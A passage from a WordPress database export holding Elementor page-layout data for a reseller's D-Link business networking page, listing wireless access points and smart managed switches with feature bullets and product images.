Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"70\",\"bottom\":\"70\",\"left\":\"70\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7255,3365,'_elementor_version','2.5.14'),(7256,3365,'_elementor_edit_mode','builder'),(7259,3366,'_wp_page_template','template-fullwidth.php'),(7260,3366,'_elementor_template_type','post'),(7261,3366,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"84\",\"right\":\"84\",\"bottom\":\"84\",\"left\":\"84\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access 